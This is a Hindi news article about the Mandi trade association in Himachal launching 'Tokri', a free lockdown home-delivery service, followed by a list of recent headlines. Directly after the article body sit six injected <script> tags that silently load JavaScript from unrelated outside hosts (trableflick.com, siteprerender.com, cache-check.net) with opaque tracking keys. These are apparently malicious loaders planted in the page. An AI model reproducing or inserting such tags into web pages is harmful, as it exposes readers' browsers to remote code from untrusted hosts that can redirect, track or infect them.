Categories: हिमाचल

मंडी व्यपार मंडल ने शुरु की, “टोकरी” होम डिलीवरी सेवा

<p>लॉकडाउन के चलते लोगों को घर द्वार पर आवश्यक वस्तुओं की आपूर्ति केलिए मंडी व्यपार मंडल की ओर से टोकरी नाम से होम डिलीवरी सेवा की शुरूआत की गई है। जिसमें शुरूआती दौर पर कम से कम तीन सौ रूपए की आवश्यक वस्तुएं लोगों की डिमांड पर घरद्वार तक पहुंचाई जाएगी। मंडी व्यपार मंडल के प्रधान राजेश महेंदू्र ने बताया कि प्रदेश सरकार और जिला प्रशासन की मुहीम को आगे बढ़ाते हुए लोगों को उनके घरद्वार पर रोजमर्रा की आवश्यक वस्तुएं और दवाएं आदि कॉल सेंटर के माध्यम से आर्डर दिया जा सकता है। उन्होंने बताया कि व्यपार मंडल की इस मुहीम को टोकरी नाम दिया गया है। जिसे वैबसन टैक्रोलॉजी जो वेबसाईट डिजाइनिंग का कार्य करते हैं के माध्यम से यह योजना कार्यान्वित की जाएगी। वैबसन के प्रभारी नीरज गुप्ता ने बताया कि इस बारे व्यापार मंडल की ओर से उनसे संपर्क साधा गया। जिसमें कहा गया कि मंडी शहर में घर.घर तक आवश्यक वस्तुओं की आपूर्ति केलिए कोई योजना शुरू की जानी है। जिसमें संस्था की मदद दरकार है। उन्होंने बताया कि व्यापार मंडल से विचार विमर्श के बाद टोकरी नाम की इस योजना का प्रारूप तैयार किया गया। आने वाले समय में इसकी वैबसाईट भी तैयार की जाएगी। जिसके माध्यम से ग्राहक अपनी डिमांड दे सकते हैं। जबकि ग्राहक से डिलीवरी का कोई भी चार्ज नहीं लिया जाएगा।</p>

<p>मंडी व्यापार मंडी के प्रधान राजेश महेंदू्र ने बताया कि करयाना, कपड़ा, दवाई, स्वर्णकार के अलावा और भी जो व्यापारी इस योजना में जुडऩा चाहते हैं ,तो उनका भी स्वागत है। टोकरी योजना का मकसद लोगों को बुनियादी सुविधाएं प्रदान करना है।&nbsp; उन्होंने बताया कि गत दिनों 40 दिनों के लॉकडाउन के दौरान लोगों को कई तरह की परेशानियों का सामना करना पड़ा। इसको ध्यान में रखते हुए अब यह योजना शुरू की है। वहीं पर नीरज गुप्ता ने बताया कि शुरू में यह योजना मंडी के तेरह वार्डों में लागू होगी। अगर आसपास के क्षेत्रों से डिमांड आने लगेगी तो शहर के बाहर दो किलोमीटर के दायरे में भी सामान की आपूर्ति की जाएगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_327762627&amp;key=21aca573d498d25317&amp;cv=1589117756&amp;t=1589117757090″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_271702400&amp;key=21aca573d498d25317&amp;cv=24179&amp;t=1589117757090″ type=”text/javascript”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1589117757094″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

मतदाताओं को मतदान का संदेश देने के लिए साइकलिंग एक्सपीडिशन स्पीति पहुंची

दुनिया के सबसे ऊंचे पोलिंग बूथ टशीगंग से साइकिल सवार देश के मतदाताओं को मतदान…

4 hours ago

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू-माफिया: CM

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू- माफिया : मुख्यमंत्री…

4 hours ago

बैजनाथ सहित अन्य विधानसभा क्षेत्र में सहायक मतदान केन्द्र होंगे स्थापित

विधानसभा क्षेत्र 20-बैजनाथ (अ.जा.) के 99-बड़ाभंगाल और 54-कसौली (अ.जा.) के 27-ढिल़्लों में सहायक मतदान केन्द्र…

4 hours ago

हिमाचल की चारों सीटों पर प्रचंड बहुमत से कमल खिलेगा: BJP

भारतीय जनता पार्टी के राष्ट्रीय अध्यक्ष जगत प्रकाश नड्डा द्वारा हिमाचल प्रदेश के नूरपुर, चंबा…

4 hours ago

डीसी ने मुल्थान में प्रभावित क्षेत्र का लिया जायजा, प्रबंधन को दिए निर्देश

उपायुक्त हेमराज बैरवा ने शनिवार को मुल्थान में पन बिजली परियोजना से प्रभावित क्षेत्र का…

4 hours ago

दस साल से रेलवे लाइन का राग ही अलाप रहे अनुराग, मंजूरी तक नहीं दिला पाए : मुख्यमंत्री

नादौन: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने नादौन में पत्रकारों के साथ बातचीत में कहा…

20 hours ago